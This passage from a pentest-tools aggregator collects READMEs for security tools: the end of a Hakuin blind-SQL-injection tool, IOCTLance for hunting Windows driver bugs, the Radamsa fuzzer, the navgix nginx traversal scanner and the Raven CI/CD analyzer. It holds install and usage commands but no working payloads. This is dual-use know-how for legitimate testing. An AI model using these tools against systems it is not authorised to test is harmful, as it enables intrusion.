    More examples can be found in the tests directory.

    Using Hakuin from the Command Line

    Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

    python3 hk.py -h

    For Researchers

    This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

    Cite Hakuin

    @inproceedings{hakuin_bsqli,
    title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
    author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
    booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
    pages={384--393},
    year={2023},
    organization={IEEE}
    }



    Ioctlance - A Tool That Is Used To Hunt Vulnerabilities In X64 WDM Drivers

    By: Zion3R — May 8th 2024 at 12:30

    Description

    Presented at CODE BLUE 2023, this project, titled Enhanced Vulnerability Hunting in WDM Drivers with Symbolic Execution and Taint Analysis, introduces IOCTLance, a tool that enhances the capacity to detect various vulnerability types in Windows Driver Model (WDM) drivers. In a comprehensive evaluation involving 104 known vulnerable WDM drivers and 328 unknown ones, IOCTLance successfully unveiled 117 previously unidentified vulnerabilities within 26 distinct drivers. As a result, 41 CVEs were reported, encompassing 25 cases of denial of service, 5 instances of insufficient access control, and 11 examples of elevation of privilege.


    Features

    Target Vulnerability Types

    • map physical memory
    • controllable process handle
    • buffer overflow
    • null pointer dereference
    • read/write controllable address
    • arbitrary shellcode execution
    • arbitrary wrmsr
    • arbitrary out
    • dangerous file operation

    Optional Customizations

    • length limit
    • loop bound
    • total timeout
    • IoControlCode timeout
    • recursion
    • symbolize data section

    Build

    Docker (Recommended)

    docker build .

    Local

    dpkg --add-architecture i386
    apt-get update
    apt-get install git build-essential python3 python3-pip python3-dev htop vim sudo \
    openjdk-8-jdk zlib1g:i386 libtinfo5:i386 libstdc++6:i386 libgcc1:i386 \
    libc6:i386 libssl-dev nasm binutils-multiarch qtdeclarative5-dev libpixman-1-dev \
    libglib2.0-dev debian-archive-keyring debootstrap libtool libreadline-dev cmake \
    libffi-dev libxslt1-dev libxml2-dev

    pip install angr==9.2.18 ipython==8.5.0 ipdb==0.13.9

    Analysis

    # python3 analysis/ioctlance.py -h
    usage: ioctlance.py [-h] [-i IOCTLCODE] [-T TOTAL_TIMEOUT] [-t TIMEOUT] [-l LENGTH] [-b BOUND]
    [-g GLOBAL_VAR] [-a ADDRESS] [-e EXCLUDE] [-o] [-r] [-c] [-d]
    path

    positional arguments:
    path dir (including subdirectory) or file path to the driver(s) to analyze

    optional arguments:
    -h, --help show this help message and exit
    -i IOCTLCODE, --ioctlcode IOCTLCODE
    analyze specified IoControlCode (e.g. 22201c)
    -T TOTAL_TIMEOUT, --total_timeout TOTAL_TIMEOUT
    total timeout for the whole symbolic execution (default 1200, 0 to unlimited)
    -t TIMEOUT, --timeout TIMEOUT
    timeout for analyze each IoControlCode (default 40, 0 to unlimited)
    -l LENGTH, --length LENGTH
    the limit of number of instructions for technique LengthLimiter (default 0, 0 to unlimited)
    -b BOUND, --bound BOUND
    the bound for technique LoopSeer (default 0, 0 to unlimited)
    -g GLOBAL_VAR, --global_var GLOBAL_VAR
    symbolize how many bytes in .data section (default 0 hex)
    -a ADDRESS, --address ADDRESS
    address of ioctl handler to directly start hunting with blank state (e.g.
    140005c20)
    -e EXCLUDE, --exclude EXCLUDE
    exclude function address split with , (e.g. 140005c20,140006c20)
    -o, --overwrite overwrite x.sys.json if x.sys has been analyzed (default False)
    -r, --recursion do not kill state if detecting recursion (default False)
    -c, --complete get complete base state (default False)
    -d, --debug print debug info while analyzing (default False)
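
    A small batch-analysis sketch (an assumption-laden illustration: it presumes the repository layout above and that results land next to each driver as <name>.sys.json, as the --overwrite help text suggests):

    import json
    import pathlib
    import subprocess

    DRIVER_DIR = pathlib.Path("drivers")   # directory of .sys files to analyze (example path)

    # Run the analysis over the whole directory (subdirectories included).
    subprocess.run(["python3", "analysis/ioctlance.py", str(DRIVER_DIR)], check=True)

    # Collect and summarize whatever result files were produced.
    for report in sorted(DRIVER_DIR.glob("*.sys.json")):
        with open(report) as fh:
            data = json.load(fh)
        print(f"{report.name}: top-level keys -> {sorted(data)}")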

    Evaluation

    # python3 evaluation/statistics.py -h
    usage: statistics.py [-h] [-w] path

    positional arguments:
    path target dir or file path

    optional arguments:
    -h, --help show this help message and exit
    -w, --wdm copy the wdm drivers into <path>/wdm

    Test

    1. Compile the testing examples in test to generate testing driver files.
    2. Run IOCTLance against the driver files.

    Reference




    Radamsa - A General-Purpose Fuzzer

    By: Zion3R — March 25th 2024 at 11:30


    Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestingly different outputs from them. The main selling points of radamsa are that it has already found a slew of bugs in programs that actually matter, it is easily scriptable and easy to get up and running.


    Nutshell:

     $ # please please please fuzz your programs. here is one way to get data for it:
    $ sudo apt-get install gcc make git wget
    $ git clone https://gitlab.com/akihe/radamsa.git && cd radamsa && make && sudo make install
    $ echo "HAL 9000" | radamsa

    What the Fuzz

    Programming is hard. All nontrivial programs have bugs in them. What's more, in some of the most widely used programming languages even the simplest typical mistakes are usually enough for attackers to gain undesired powers.

    Fuzzing is one of the techniques to find such unexpected behavior from programs. The idea is simply to subject the program to various kinds of inputs and see what happens. There are two parts in this process: getting the various kinds of inputs and seeing what happens. Radamsa is a solution to the first part, and the second part is typically a short shell script. Testers usually have a more or less vague idea of what should not happen, and they try to find out if this is so. This kind of testing is often referred to as negative testing, being the opposite of positive unit or integration testing. Developers know a service should not crash, should not consume exponential amounts of memory, should not get stuck in an infinite loop, etc. Attackers know that they can probably turn certain kinds of memory safety bugs into exploits, so they typically fuzz instrumented versions of the target programs and wait for such errors to be found. In theory, the idea is to disprove, by finding a counterexample, a theorem about the program stating that for all inputs something doesn't happen.

    There are many kinds of fuzzers and ways to apply them. Some trace the target program and generate test cases based on the behavior. Some need to know the format of the data and generate test cases based on that information. Radamsa is an extremely "black-box" fuzzer, because it needs no information about the program nor the format of the data. One can pair it with coverage analysis during testing to likely improve the quality of the sample set during a continuous test run, but this is not mandatory. The main goal is to first get tests running easily, and then refine the technique applied if necessary.

    Radamsa is intended to be a good general purpose fuzzer for all kinds of data. The goal is to be able to find issues no matter what kind of data the program processes, whether it's xml or mp3, and conversely that not finding bugs implies that other similar tools likely won't find them either. This is accomplished by having various kinds of heuristics and change patterns, which are varied during the tests. Sometimes there is just one change, sometimes there is a slew of them, sometimes there are bit flips, sometimes something more advanced and novel.

    Radamsa is a side-product of OUSPG's Protos Genome Project, in which some techniques to automatically analyze and examine the structure of communication protocols were explored. A subset of one of the tools turned out to be a surprisingly effective file fuzzer. The first prototype black-box fuzzer tools mainly used regular and context-free formal languages to represent the inferred model of the data.

    Requirements

    Supported operating systems:

    • GNU/Linux
    • OpenBSD
    • FreeBSD
    • Mac OS X
    • Windows (using Cygwin)

    Software requirements for building from sources:

    • gcc / clang
    • make
    • git
    • wget

    Building Radamsa

     $ git clone https://gitlab.com/akihe/radamsa.git
    $ cd radamsa
    $ make
    $ sudo make install # optional, you can also just grab bin/radamsa
    $ radamsa --help

    Radamsa itself is just a single binary file which has no external dependencies. You can move it where you please and remove the rest.

    Fuzzing with Radamsa

    This section assumes some familiarity with UNIX scripting.

    Radamsa can be thought of as the cat UNIX tool, which manages to break the data in often interesting ways as it flows through. It also has support for generating more than one output at a time and acting as a TCP server or client, in case such things are needed.

    Use of radamsa will be demonstrated by means of small examples. We will use the bc arbitrary precision calculator as an example target program.

    In the simplest case, from a scripting point of view, radamsa can be used to fuzz data going through a pipe.

     $ echo "aaa" | radamsa
    aaaa

    Here radamsa decided to add one 'a' to the input. Let's try that again.

     $ echo "aaa" | radamsa
    ːaaa

    Now we got another result. By default radamsa will grab a random seed from /dev/urandom if it is not given a specific random state to start from, and you will generally see a different result every time it is started, though for small inputs you might see the same or the original fairly often. The random state to use can be given with the -s parameter, which is followed by a number. Using the same random state will result in the same data being generated.

     $ echo "Fuzztron 2000" | radamsa --seed 4
    Fuzztron 4294967296

    This particular example was chosen because radamsa happens to choose to use a number mutator, which replaces textual numbers with something else. Programmers might recognize why for example this particular number might be an interesting one to test for.

    You can generate more than one output by using the -n parameter as follows:

     $ echo "1 + (2 + (3 + 4))" | radamsa --seed 12 -n 4
    1 + (2 + (2 + (3 + 4?)
    1 + (2 + (3 +?4))
    18446744073709551615 + 4)))
    1 + (2 + (3 + 170141183460469231731687303715884105727))

    There is no guarantee that all of the outputs will be unique. However, when using nontrivial samples, equal outputs tend to be extremely rare.

    What we have so far can be used, for example, to test programs that read input from standard input, as in

     $ echo "100 * (1 + (2 / 3))" | radamsa -n 10000 | bc
    [...]
    (standard_in) 1418: illegal character: ^_
    (standard_in) 1422: syntax error
    (standard_in) 1424: syntax error
    (standard_in) 1424: memory exhausted
    [hang]

    Or the compiler used to compile Radamsa:

     $ echo '((lambda (x) (+ x 1)) #x124214214)' | radamsa -n 10000 | ol
    [...]
    > What is 'Γ³ Β΅'?
    4901126677
    > $

    Or to test decompression:

     $ gzip -c /bin/bash | radamsa -n 1000 | gzip -d > /dev/null

    Typically however one might want separate runs for the program for each output. Basic shell scripting makes this easy. Usually we want a test script to run continuously, so we'll use an infinite loop here:

     $ gzip -c /bin/bash > sample.gz
    $ while true; do radamsa sample.gz | gzip -d > /dev/null; done

    Notice that we are here giving the sample as a file instead of running Radamsa in a pipe. Like cat Radamsa will by default write the output to stdout, but unlike cat when given more than one file it will usually use only one or a few of them to create one output. This test will go about throwing fuzzed data against gzip, but doesn't care what happens then. One simple way to find out if something bad happened to a (simple single-threaded) program is to check whether the exit value is greater than 127, which would indicate a fatal program termination. This can be done for example as follows:

     $ gzip -c /bin/bash > sample.gz
    $ while true
    do
    radamsa sample.gz > fuzzed.gz
    gzip -dc fuzzed.gz > /dev/null
    test $? -gt 127 && break
    done

    This will run for as long as it takes to crash gzip, which hopefully is no longer even possible, and the fuzzed.gz can be used to check the issue if the script has stopped. We have found a few such cases, the last one of which took about 3 months to find, but all of them have as usual been filed as bugs and have been promptly fixed by the upstream.

    One thing to note is that since most of the outputs are based on data in the given samples (standard input or files given at the command line) it is usually a good idea to try to find good samples, and preferably more than one of them. In a more real-world test script radamsa will usually be used to generate more than one output at a time based on tens or thousands of samples, and the consequences of the outputs are tested mostly in parallel, often by giving each of the outputs on the command line to the target program. We'll make a simple such script for bc, which accepts files from the command line. The -o flag can be used to give a file name to which radamsa should write the output instead of standard output. If more than one output is generated, the path should have a %n in it, which will be expanded to the number of the output.

     $ echo "1 + 2" > sample-1
    $ echo "(124 % 7) ^ 1*2" > sample-2
    $ echo "sqrt((1 + length(10^4)) * 5)" > sample-3
    $ bc sample-* < /dev/null
    3
    10
    5
    $ while true
    do
    radamsa -o fuzz-%n -n 100 sample-*
    bc fuzz-* < /dev/null
    test $? -gt 127 && break
    done

    This will again run up to obviously interesting times indicated by the large exit value, or up to the target program getting stuck.

    In practice many programs fail in unique ways. Some common ways to catch obvious errors are to check the exit value, enable fatal signal printing in kernel and checking if something new turns up in dmesg, run a program under strace, gdb or valgrind and see if something interesting is caught, check if an error reporter process has been started after starting the program, etc.
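
    The same idea can be scripted in Python when you want to run the generated cases in parallel and flag signal-killed runs. The sketch below reuses the bc samples from above and is only an illustration (paths and worker count are arbitrary):

    import concurrent.futures
    import glob
    import subprocess

    # Generate 100 test cases from the sample files.
    subprocess.run(["radamsa", "-o", "fuzz-%n", "-n", "100", "sample-1", "sample-2", "sample-3"],
                   check=True)

    def run_case(path):
        # A negative return code means the target was killed by a signal (e.g. SIGSEGV).
        result = subprocess.run(["bc", path], stdin=subprocess.DEVNULL,
                                stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        return path, result.returncode

    with concurrent.futures.ThreadPoolExecutor(max_workers=8) as pool:
        for path, code in pool.map(run_case, sorted(glob.glob("fuzz-*"))):
            if code < 0:
                print(f"{path}: killed by signal {-code}")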

    Output Options

    The examples above all either wrote to standard output or files. One can also ask radamsa to be a TCP client or server by using a special parameter to -o. The output patterns are:

    -o argument   meaning                                                     example
    :port         act as a TCP server in given port                           # radamsa -o :80 -n inf samples/*.http-resp
    ip:port       connect as TCP client to port of ip                         $ radamsa -o 127.0.0.1:80 -n inf samples/*.http-req
    -             write to stdout                                             $ radamsa -o - samples/*.vt100
    path          write to files, %n is testcase # and %s the first suffix    $ radamsa -o test-%n.%s -n 100 samples/*.foo

    Remember that you can use e.g. tcpflow to record TCP traffic to files, which can then be used as samples for radamsa.

    Related Tools

    A non-exhaustive list of free complementary tools:

    • GDB (http://www.gnu.org/software/gdb/)
    • Valgrind (http://valgrind.org/)
    • AddressSanitizer (http://code.google.com/p/address-sanitizer/wiki/AddressSanitizer)
    • strace (http://sourceforge.net/projects/strace/)
    • tcpflow (http://www.circlemud.org/~jelson/software/tcpflow/)

    A non-exhaustive list of related free tools:

    • American fuzzy lop (http://lcamtuf.coredump.cx/afl/)
    • Zzuf (http://caca.zoy.org/wiki/zzuf)
    • Bunny the Fuzzer (http://code.google.com/p/bunny-the-fuzzer/)
    • Peach (http://peachfuzzer.com/)
    • Sulley (http://code.google.com/p/sulley/)

    Tools which are intended to improve security are usually complementary and should be used in parallel to improve the results. Radamsa aims to be an easy-to-set-up general purpose shotgun test to expose the easiest (and often severe due to being reachable via input streams) cracks which might be exploitable by getting the program to process malicious data. It has also turned out to be useful for catching regressions when combined with continuous automatic testing.

    Some Known Results

    A robustness testing tool is obviously only good if it really can find non-trivial issues in real-world programs. Being a University-based group, we have tried to formulate some more scientific approaches to define what a 'good fuzzer' is, but real users are more likely to be interested in whether a tool has found something useful. We do not have anyone at OUSPG running tests or even developing Radamsa full-time, but we obviously do make occasional test-runs, both to assess the usefulness of the tool, and to help improve robustness of the target programs. For the test-runs we try to select programs that are mature, useful to us, widely used, and, preferably, open source and/or tend to process data from outside sources.

    The list below has some CVEs we know of that have been found by using Radamsa. Some of the results are from our own test runs, and some have been kindly provided by CERT-FI from their tests and other users. As usual, please note that CVEs should be read as 'product X is now more robust (against Y)'.

    CVE program credit
    CVE-2007-3641 libarchive OUSPG
    CVE-2007-3644 libarchive OUSPG
    CVE-2007-3645 libarchive OUSPG
    CVE-2008-1372 bzip2 OUSPG
    CVE-2008-1387 ClamAV OUSPG
    CVE-2008-1412 F-Secure OUSPG
    CVE-2008-1837 ClamAV OUSPG
    CVE-2008-6536 7-zip OUSPG
    CVE-2008-6903 Sophos Anti-Virus OUSPG
    CVE-2010-0001 Gzip integer underflow in unlzw
    CVE-2010-0192 Acroread OUSPG
    CVE-2010-1205 libpng OUSPG
    CVE-2010-1410 Webkit OUSPG
    CVE-2010-1415 Webkit OUSPG
    CVE-2010-1793 Webkit OUSPG
    CVE-2010-2065 libtiff found by CERT-FI
    CVE-2010-2443 libtiff found by CERT-FI
    CVE-2010-2597 libtiff found by CERT-FI
    CVE-2010-2482 libtiff found by CERT-FI
    CVE-2011-0522 VLC found by Harry Sintonen
    CVE-2011-0181 Apple ImageIO found by Harry Sintonen
    CVE-2011-0198 Apple Type Services found by Harry Sintonen
    CVE-2011-0205 Apple ImageIO found by Harry Sintonen
    CVE-2011-0201 Apple CoreFoundation found by Harry Sintonen
    CVE-2011-1276 Excel found by Nicolas Grégoire of Agarri
    CVE-2011-1186 Chrome OUSPG
    CVE-2011-1434 Chrome OUSPG
    CVE-2011-2348 Chrome OUSPG
    CVE-2011-2804 Chrome/pdf OUSPG
    CVE-2011-2830 Chrome/pdf OUSPG
    CVE-2011-2839 Chrome/pdf OUSPG
    CVE-2011-2861 Chrome/pdf OUSPG
    CVE-2011-3146 librsvg found by Sauli Pahlman
    CVE-2011-3654 Mozilla Firefox OUSPG
    CVE-2011-3892 Theora OUSPG
    CVE-2011-3893 Chrome OUSPG
    CVE-2011-3895 FFmpeg OUSPG
    CVE-2011-3957 Chrome OUSPG
    CVE-2011-3959 Chrome OUSPG
    CVE-2011-3960 Chrome OUSPG
    CVE-2011-3962 Chrome OUSPG
    CVE-2011-3966 Chrome OUSPG
    CVE-2011-3970 libxslt OUSPG
    CVE-2012-0449 Firefox found by Nicolas GrΓ©goire of Agarri
    CVE-2012-0469 Mozilla Firefox OUSPG
    CVE-2012-0470 Mozilla Firefox OUSPG
    CVE-2012-0457 Mozilla Firefox OUSPG
    CVE-2012-2825 libxslt found by Nicolas GrΓ©goire of Agarri
    CVE-2012-2849 Chrome/GIF OUSPG
    CVE-2012-3972 Mozilla Firefox found by Nicolas GrΓ©goire of Agarri
    CVE-2012-1525 Acrobat Reader found by Nicolas GrΓ©goire of Agarri
    CVE-2012-2871 libxslt found by Nicolas GrΓ©goire of Agarri
    CVE-2012-2870 libxslt found by Nicolas GrΓ©goire of Agarri
    CVE-2012-4922 tor found by the Tor project
    CVE-2012-5108 Chrome OUSPG via NodeFuzz
    CVE-2012-2887 Chrome OUSPG via NodeFuzz
    CVE-2012-5120 Chrome OUSPG via NodeFuzz
    CVE-2012-5121 Chrome OUSPG via NodeFuzz
    CVE-2012-5145 Chrome OUSPG via NodeFuzz
    CVE-2012-4186 Mozilla Firefox OUSPG via NodeFuzz
    CVE-2012-4187 Mozilla Firefox OUSPG via NodeFuzz
    CVE-2012-4188 Mozilla Firefox OUSPG via NodeFuzz
    CVE-2012-4202 Mozilla Firefox OUSPG via NodeFuzz
    CVE-2013-0744 Mozilla Firefox OUSPG via NodeFuzz
    CVE-2013-1691 Mozilla Firefox OUSPG
    CVE-2013-1708 Mozilla Firefox OUSPG
    CVE-2013-4082 Wireshark found by cons0ul
    CVE-2013-1732 Mozilla Firefox OUSPG
    CVE-2014-0526 Adobe Reader X/XI Pedro Ribeiro (pedrib@gmail.com)
    CVE-2014-3669 PHP
    CVE-2014-3668 PHP
    CVE-2014-8449 Adobe Reader X/XI Pedro Ribeiro (pedrib@gmail.com)
    CVE-2014-3707 cURL Symeon Paraschoudis
    CVE-2014-7933 Chrome OUSPG
    CVE-2015-0797 Mozilla Firefox OUSPG
    CVE-2015-0813 Mozilla Firefox OUSPG
    CVE-2015-1220 Chrome OUSPG
    CVE-2015-1224 Chrome OUSPG
    CVE-2015-2819 Sybase SQL vah_13 (ERPScan)
    CVE-2015-2820 SAP Afaria vah_13 (ERPScan)
    CVE-2015-7091 Apple QuickTime Pedro Ribeiro (pedrib@gmail.com)
    CVE-2015-8330 SAP PCo agent Mathieu GELI (ERPScan)
    CVE-2016-1928 SAP HANA hdbxsengine Mathieu Geli (ERPScan)
    CVE-2016-3979 SAP NetWeaver @ret5et (ERPScan)
    CVE-2016-3980 SAP NetWeaver @ret5et (ERPScan)
    CVE-2016-4015 SAP NetWeaver @vah_13 (ERPScan)
    CVE-2016-9562 SAP NetWeaver @vah_13 (ERPScan)
    CVE-2017-5371 SAP ASE OData @vah_13 (ERPScan)
    CVE-2017-9843 SAP NETWEAVER @vah_13 (ERPScan)
    CVE-2017-9845 SAP NETWEAVER @vah_13 (ERPScan)
    CVE-2018-0101 Cisco ASA WebVPN/AnyConnect @saidelike (NCC Group)

    We would like to thank the Chromium project and Mozilla for analyzing, fixing, and reporting many of the above-mentioned issues, CERT-FI for feedback and disclosure handling, and the other users, projects, and vendors who have responsibly taken care of the uncovered bugs.

    Thanks

    The following people have contributed to the development of radamsa in code, ideas, issues or otherwise.

    • Darkkey
    • Branden Archer

    Troubleshooting

    Issues in Radamsa can be reported to the issue tracker. The tool is under development, but we are glad to get error reports even for known issues to make sure they are not forgotten.

    You can also drop by at #radamsa on Freenode if you have questions or feedback.

    Issues in your own programs should be fixed. If Radamsa finds them quickly (say, in an hour or a day), chances are that others will too.

    Issues in other programs written by others should be dealt with responsibly. Even fairly simple errors can turn out to be exploitable, especially in programs written in low-level languages. In case you find something potentially severe, like an easily reproducible crash, and are unsure what to do with it, ask the vendor or project members, or your local CERT.

    FAQ

    Q: If I find a bug with radamsa, do I have to mention the tool?
    A: No.

    Q: Will you make a graphical version of radamsa?

    A: No. The intention is to keep it simple and scriptable for use in automated regression tests and continuous testing.

    Q: I can't install! I don't have root access on the machine!
    A: You can omit the $ make install part and just run radamsa from bin/radamsa in the build directory, or copy it somewhere else and use it from there.

    Q: Radamsa takes several GB of memory to compile!1
    A: This is most likely due to an issue with your C compiler. Use prebuilt images or try the quick build instructions on this page.

    Q: Radamsa does not compile using the instructions on this page!
    A: Please file an issue at https://gitlab.com/akihe/radamsa/issues/new if you don't see a similar one already filed, send email (aohelin@gmail.com) or IRC (#radamsa on freenode).

    Q: I used fuzzer X and found many more bugs in program Y than Radamsa did.
    A: Cool. Let me know about it (aohelin@gmail.com) and I'll try to hack something X-ish into radamsa if it's general purpose enough. It would also be useful to get some of the samples you used, to check how well radamsa does, because it might be overfitting to some heuristic.

    Q: Can I get support for using radamsa?
    A: You can send email to aohelin@gmail.com or check if some of us happen to be hanging around at #radamsa on freenode.

    Q: Can I use radamsa on Windows?
    A: An experimental Windows executable is now in Downloads, but it has usually not been tested properly since we rarely use Windows internally. Feel free to file an issue if something is broken.

    Q: How can I install radamsa?
    A: Grab a binary from downloads and run it, or $ make && sudo make install.

    Q: How can I uninstall radamsa?
    A: Remove the binary you grabbed from downloads, or $ sudo make uninstall.

    Q: Why are many outputs generated by Radamsa equal?
    A: Radamsa doesn't keep track of which outputs it has already generated, but instead relies on varying mutations to keep the output varied enough. Outputs can often be identical if you give only a few small samples and generate lots of outputs from them. If you do spot a case where lots of equal outputs are generated, we'd be interested in hearing about it.

    Q: There are lots of command line options. Which should I use for best results?
    A: The recommended use is $ radamsa -o output-%n.foo -n 100 samples/*.foo, which is also what is used internally at OUSPG. It's usually best and most future-proof to let radamsa decide the details.

    Q: How can I make radamsa faster?
    A: Radamsa typically writes a few megabytes of output per second. If you enable only simple mutations, e.g. -m bf,bd,bi,br,bp,bei,bed,ber,sr,sd, you will get about 10x faster output.

    Q: What's with the funny name?
    A: It's from a scene in a Finnish children's story. You've probably never heard about it.

    Q: Is this the last question?
    A: Yes.

    Warnings

    Use of data generated by radamsa, especially when targeting buggy programs running with high privileges, can result in arbitrarily bad things happening. A typical unexpected issue is caused by a file manager, automatic indexer or antivirus scanner trying to do something to the fuzzed data before it is tested intentionally. We have seen spontaneous reboots, system hangs, file system corruption, loss of data, and other nastiness. When in doubt, use a disposable system, throwaway profile, chroot jail, sandbox, separate user account, or an emulator.

    Not safe when used as prescribed.

    This product may contain faint traces of parenthesis.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Navgix - A Multi-Threaded Golang Tool That Will Check For Nginx Alias Traversal Vulnerabilities

    By: Zion3R β€” February 5th 2024 at 11:30


    navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities


    Techniques

    Currently, navgix supports two techniques for finding vulnerable directories (or location aliases):

    Heuristics

    navgix will make an initial GET request to the page, and if any directories are referenced in the page HTML (in src attributes on HTML elements), it will test each folder in the path for the vulnerability. For example, if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.
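    The prefix derivation described above boils down to something like the following sketch (written in Python for illustration; navgix itself is a Go tool):

    # Illustrative sketch (Python; navgix itself is written in Go) of deriving the
    # directory prefixes to probe from an asset path found in the page HTML.
    from urllib.parse import urlparse

    def candidate_dirs(asset_url):
        # '/static/img/photos/avatar.png' -> ['/static/', '/static/img/', '/static/img/photos/']
        parts = [p for p in urlparse(asset_url).path.split("/") if p][:-1]
        prefixes, current = [], ""
        for part in parts:
            current += "/" + part
            prefixes.append(current + "/")
        return prefixes

    print(candidate_dirs("https://example.com/static/img/photos/avatar.png"))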

    Brute-force

    navgix will also test a short list of directories that commonly have this vulnerability, and if any of these directories exist, it will attempt to confirm whether the vulnerability is present.

    Installation

    git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
    go build

    Acknowledgements



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Raven - CI/CD Security Analyzer

    By: Zion3R β€” January 28th 2024 at 11:30


    RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.

    With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:

    We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.


    What is Raven

    The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:

    • Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
    • Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
    • Query Library: We created a library of pre-defined queries based on research conducted by the community.
    • Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.

    Possible usages for Raven:

    • Scanner for your own organization's security
    • Scanning specified organizations for bug bounty purposes
    • Scan everything and report issues found to save the internet
    • Research and learning purposes

    This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.

    Why Raven

    In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:

    • A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
    • We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
    • We detailed a completely different attack vector, 3rd party integration risks, the most popular project on GitHub, and thousands more.
    • Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.
    • Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.

    Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.

    It was for these reasons that Raven was created: a framework for CI/CD security analysis workflows (with GitHub Actions as the first use case). In our research, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.

    Setup && Run

    To get started with Raven, follow these installation instructions:

    Step 1: Install the Raven package

    pip3 install raven-cycode

    Step 2: Setup a local Redis server and Neo4j database

    docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
    docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1

    Another way to set up the environment is by running our provided docker compose file:

    git clone https://github.com/CycodeLabs/raven.git
    cd raven
    make setup

    Step 3: Run Raven Downloader

    Org mode:

    raven download org --token $GITHUB_TOKEN --org-name RavenDemo

    Crawl mode:

    raven download crawl --token $GITHUB_TOKEN --min-stars 1000

    Step 4: Run Raven Indexer

    raven index

    Step 5: Inspect the results through the reporter

    raven report --format raw

    At this point, it is possible to inspect the data in the Neo4j database by connecting to http://localhost:7474/browser/.
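    For scripted access instead of the browser, a minimal sketch using the neo4j Python driver and the default credentials from Step 2 could look like the following. The Workflow label and path property are assumptions for illustration only; check the actual schema in the browser first.

    # Minimal sketch of querying the Raven graph with the neo4j Python driver,
    # using the default credentials from Step 2. The "Workflow" label and "path"
    # property are assumptions for illustration; inspect the real schema first.
    from neo4j import GraphDatabase

    driver = GraphDatabase.driver("neo4j://localhost:7687", auth=("neo4j", "123456789"))
    with driver.session() as session:
        for record in session.run("MATCH (w:Workflow) RETURN w.path AS path LIMIT 10"):
            print(record["path"])
    driver.close()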

    Prerequisites

    • Python 3.9+
    • Docker Compose v2.1.0+
    • Docker Engine v1.13.0+

    Infrastructure

    Raven uses two primary Docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.

    Usage

    The tool provides three main functionalities: download, index, and report.

    Download

    Download Organization Repositories

    usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME

    options:
    -h, --help show this help message and exit
    --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
    --debug Whether to print debug statements, default: False
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --org-name ORG_NAME Organization name to download the workflows

    Download Public Repositories

    usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]

    options:
    -h, --help show this help message and exit
    --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
    --debug Whether to print debug statements, default: False
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --max-stars MAX_STARS
    Maximum number of stars for a repository
    --min-stars MIN_STARS
    Minimum number of stars for a repository, default : 1000

    Index

    usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
    [--clean-neo4j] [--debug]

    options:
    -h, --help show this help message and exit
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --neo4j-uri NEO4J_URI
    Neo4j URI endpoint, default: neo4j://localhost:7687
    --neo4j-user NEO4J_USER
    Neo4j username, default: neo4j
    --neo4j-pass NEO4J_PASS
    Neo4j password, default: 123456789
    --clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
    --debug Whether to print debug statements, default: False

    Report

